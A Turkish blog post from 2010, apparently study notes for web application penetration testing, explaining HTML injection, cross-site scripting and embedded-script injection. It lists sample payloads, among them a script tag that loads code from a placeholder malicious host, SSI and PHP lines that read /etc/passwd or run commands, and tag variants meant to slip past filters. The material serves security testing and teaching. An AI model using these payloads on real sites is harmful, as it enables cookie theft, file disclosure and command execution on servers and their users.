19 Ekim 2010 Salı

HE:WA-C6 HTML Injection



HTML Injection

En basit script atağı form alanına <script> tag'ini girmek. Bu atağın gerçek hedefleri, kötü niyetli içeriği görecek olan diğer uygulama kullanıcıları olacaktır ki, sosyal mühendislik saldırısına kurban olacaklar.

Bu saldırının 2 ön şartı var:

  1. Uygulama kullanıcıdan girdi kabul etmek zorunda. Dikkat: bu girdi form alanından yapılamk zorunda değil; URL sorgu parametresi, HTTP header ve cookiler de olabilir.
  2. Uygulama, girdiyi tekrar göstermeli. Saldırı, uygulama veriyi render ettiğinde oluşacaktır; girdi HTML tag olacak ve borwser tarafından yorumlanacak.

XSS (Cross-Site Scripting)

XSS saldırılarında kötü niyetli kod, genellike JavaScript, başka kullanıcıların göreceği lokasyonlara yerleştirilir. Genelde kullanıcının cookie'sini çalmak için kullanılır.

<script>document.write(document.cookie)</script>

<script>alert('Salut!')</script>
<script src="http://www.malicious-host.foo/badscript.js"></script>

Üçüncü örnekte başka bir sunucudaki .js dosyası çağırılıyor ki bu şekilde uzunluk sınırlamasından rahatlıkla sıyrılabiliyoruz.

XSS saldırısının diğer yolları:
  • Bir uygulamanın arama motoru, XSS saldırıları için birincil hedeftir:
http://website/search/search.pl?qu=<script>alert('foo')</alert>
  • Hata sayfaları çoğu zaman XSS saldırılarına konu olur:
http://website/inc/errors.asp?Error=Invalid%20password
http://website/inc/errors.asp?Error=<script%20src=...

Embedded Scripts

XSS saldırısı uygulamanın başka kullanıcılarını hedef alırken, gömülü script saldırısı uygulamanın kendisini hedef alır.

Bu olayda <script> tag çiftleri değil, formatlama tag'leri kullanıyoruz: SSI direktifleri, ASP parantezleri, PHP parantezleri, SQL sorgu yapıları ve hatta HTML tag'leri. Birkaç kategori:

  • ASP sayfaları için date() fonksiyonunun sonuç dönüp dönmediği test edilir:
<%= date() %>

  • Sunucu-tarafı "include"ları :
    <!--#include virtual="global.asa" -->

    <!--#include file="/etc/passwd" -->

    <!--#exec cmd="/sbin/ifconfig –a" -->
  • Gömülü Java ve JSP de ASP kadar tehlikeli:
    <% java.util.Date today = new java.util.Date(); out.println(today); %>
  • PHP'yi unutmayalım:
    <? print(Date("1 F d, Y")); ?>

    <? Include '/etc/passwd' ?>
    <? passthru("id");?>

Cookies and Predefined Headers

Küçük ve büyük işaretlerini HTML-encode değerlerine çevirelim: &lt; küçüktür için ve &gt; büyüktür için.
Bazı uygulamalar kullanıcının bold, italik, altı çizgili vs değerler girmesine izin vermesi gerekebilir. Bu durumda sadece zararlı olduğunu düşündüğü tag'leri engelleme yoluna gidilmiş olabilir. Bu gibi durumlar için aşağıdakine benzer girdi değerleri deneyebiliriz:
<scr%69pt>
<<script>
<a href="javascript:commands..."></a>
<b+<script>
<scrscriptipt> (uygulama gördüğü "script"leri null ile değiştiriyor ise)
zaman:
Etiketler: , ,

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)

Web Uygulama Sızma Testleri İçin Kontrol Listeleri - V

Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....